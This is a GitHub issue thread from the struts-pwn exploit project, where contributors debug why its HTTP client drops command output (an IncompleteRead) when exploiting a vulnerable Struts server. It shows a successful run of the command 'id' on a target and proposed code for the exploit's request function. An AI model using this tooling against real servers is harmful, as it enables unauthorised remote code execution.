Issue with requests partial read #8

Closed
Reboare opened this issue Mar 4, 2018 · 6 comments
Comments

Reboare (Contributor) commented Mar 4, 2018

URLs have been obfuscated. On a vulnerable Struts server, running the default struts-pwn, an IncompleteRead is raised with 0 bytes read:

root@kali:~/CVE-2017-12617/struts-pwn# python struts-pwn.py -u http://xxxx/test.action

[*] URL: xxxx/test.action
[*] CMD: id
EXCEPTION::::--> ('Connection broken: IncompleteRead(0 bytes read)', IncompleteRead(0 bytes read))
ERROR
[%] Done.

If this is swapped out for urllib2, however, a partial response is received:

    try:
        # rq = requests.get(url, headers=headers, timeout=timeout, allow_redirects=False)
        # output = rq.text
        request = urllib2.Request(url, headers=headers)
        output = urllib2.urlopen(request).read()
    except Exception as e:
        print("EXCEPTION::::--> " + str(e))
        if hasattr(e, 'partial'):  # IncompleteRead carries the recovered bytes
            print(e.partial)
        output = 'ERROR'
    return(output)
root@kali:~/CVE-2017-12617/struts-pwn# python struts-pwn.py -u http://xxxx/test.action

[*] URL: http://xxxx/test.action
[*] CMD: id
EXCEPTION::::--> IncompleteRead(54 bytes read)
uid=115(tomcat8) gid=119(tomcat8) groups=119(tomcat8)

ERROR
[%] Done.

I've yet to identify what is causing this error behind the scenes. urllib3 appears to behave the same way as urllib2 (although I can't work out how to decode the response). Any idea whether the way requests works is causing the issue?
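For context on why urllib2 can recover data here: the IncompleteRead exception (httplib.IncompleteRead in Python 2, http.client.IncompleteRead in Python 3) stores whatever bytes it managed to read in its .partial attribute, which is what the e.partial print above surfaces. A minimal Python 3 sketch of that attribute:

```python
# Demonstrates the .partial attribute on IncompleteRead, which urllib
# raises when a server closes the connection before sending the full body.
from http.client import IncompleteRead

try:
    # Simulate a truncated read: some bytes recovered, more were expected.
    raise IncompleteRead(b"uid=115(tomcat8) gid=119(tomcat8)", expected=100)
except IncompleteRead as e:
    recovered = e.partial  # the bytes read before the connection dropped
    print(recovered.decode())
```

requests, by contrast, wraps the underlying error and does not expose the recovered bytes to the caller.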

mazen160 (Owner) commented Mar 4, 2018

Hi @Reboare,

This is a very rare issue. I remember it was reported one time before, but the solution was indirect and could lead to further errors.

I'm not sure of the best approach to fixing this issue.

Reboare (Contributor, Author) commented Mar 4, 2018

Thanks for the reply. I'm going to have a play around and see if I can find a fix. What was the indirect solution?

mazen160 (Owner) commented Mar 4, 2018

Here is the previous solution for the issue:

---
 struts-pwn.py | 17 +++++++++++------
 1 file changed, 11 insertions(+), 6 deletions(-)

diff --git a/struts-pwn.py b/struts-pwn.py
index df93d83..b8db48f 100755
--- a/struts-pwn.py
+++ b/struts-pwn.py
@@ -91,13 +91,18 @@ def exploit(url, cmd):
     }
 
     timeout = 3
+    s = []
     try:
-        output = requests.get(url, headers=headers, verify=False, timeout=timeout, allow_redirects=False).text
-    except Exception as e:
-        print("EXCEPTION::::--> " + str(e))
-        output = 'ERROR'
-    return(output)
-
+        output = requests.get(url, headers=headers, verify=False, timeout=timeout, allow_redirects=False, stream=True)
+        if output.encoding is None:
+            output.encoding = 'utf-8'
+        for line in output.iter_content(chunk_size=None,decode_unicode=True):
+            s.append(line)
+            command_response = "".join(s)
+        output.close 
+    except:
+        pass
+    return(command_response)
 
 def check(url):
     url = url_prepare(url)
-- 

mazen160 (Owner) commented Mar 4, 2018

Great!

Feel free to check it, and please let me know if you find another approach to solving the issue.

Reboare (Contributor, Author) commented Mar 4, 2018

I've found a few approaches. It seems requests doesn't handle IncompleteReads well at all and will happily throw away any data it has read.

One involves re-implementing in urllib2, which is far from ideal.

Alternatively, re-issuing the request in the event of a ChunkedEncodingError, and handling the IncompleteRead then, is possible, but it means sending two requests each time, which is a bit messy. I could add a flag to enable this, but that's really just adding cruft.
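The two-request fallback described above can be sketched roughly as follows (Python 3 names; `fetch_with_fallback` is a hypothetical helper, not part of struts-pwn): try requests first, and on a ChunkedEncodingError re-issue the request with urllib, whose IncompleteRead preserves the partial body.

```python
# Rough sketch of the double-request fallback: requests first, then urllib
# on failure so the partial body can be salvaged from IncompleteRead.
# fetch_with_fallback is a hypothetical name, not from struts-pwn itself.
import urllib.request
from http.client import IncompleteRead

import requests


def fetch_with_fallback(url, headers=None, timeout=3):
    headers = headers or {}
    try:
        return requests.get(url, headers=headers, timeout=timeout,
                            allow_redirects=False).text
    except requests.exceptions.ChunkedEncodingError:
        # Second round trip: urllib raises IncompleteRead on truncation
        # but keeps whatever bytes arrived in e.partial.
        req = urllib.request.Request(url, headers=headers)
        try:
            return urllib.request.urlopen(
                req, timeout=timeout).read().decode("utf-8", "replace")
        except IncompleteRead as e:
            return e.partial.decode("utf-8", "replace")
```

The obvious cost, as noted, is two round trips to the target for every failed read.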

The only other solution I can see is very similar to the above, although I've tried to clean it up a bit and add correct error handling:

    output = ""
    try:
        with requests.get(url, headers=headers, timeout=timeout, allow_redirects=False, stream=True) as rq:
            for chunk in rq.iter_content():
                output += chunk
    except requests.exceptions.ChunkedEncodingError as e:
        print("EXCEPTION::::--> " + str(e))
        print("Server is prematurely closing connection!")
        # output keeps whatever was read before the connection dropped
    except Exception as e:
        print(type(e))
        print("EXCEPTION::::--> " + str(e))
        output = 'ERROR'
    return(output)

By deferring the body read with stream=True and then reading the content chunk by chunk, this should close the request cleanly by wrapping it in the with block; I believe the above solution would still raise an error but leave the connection hanging. In the event of an IncompleteRead, the first except clause is always hit, but any recovered data can be returned without being discarded.

Would you be happy with this solution if I were to clean it up and submit a pull? Effectively it acts in a similar manner to .text under the hood, and I'm more than happy to add the handling .text does for unicode/apparent encoding.
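For the unicode/apparent-encoding handling mentioned above, here is a rough sketch of what Response.text does with accumulated bytes (assuming a plain utf-8 fallback as a stand-in for requests' chardet-based apparent_encoding; `decode_like_text` is a hypothetical helper name):

```python
# Sketch of decoding accumulated response bytes the way Response.text does:
# honour the declared charset if one was sent, otherwise fall back.
# decode_like_text is a hypothetical helper, not a requests API.
def decode_like_text(raw, declared_encoding=None, fallback="utf-8"):
    encoding = declared_encoding or fallback
    return raw.decode(encoding, errors="replace")

print(decode_like_text(b"uid=115(tomcat8)"))                      # fallback path
print(decode_like_text(b"caf\xe9", declared_encoding="latin-1"))  # charset path
```

In requests itself the declared encoding comes from the Content-Type charset parameter, exposed as response.encoding.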

mazen160 (Owner) commented Mar 4, 2018

Hi @Reboare,

This will be a great addition! I would be totally happy to have your solution in the repo. Once you make a pull request, I will test it on a local testing VM and then merge it to master.

Thanks again for your time and interest!
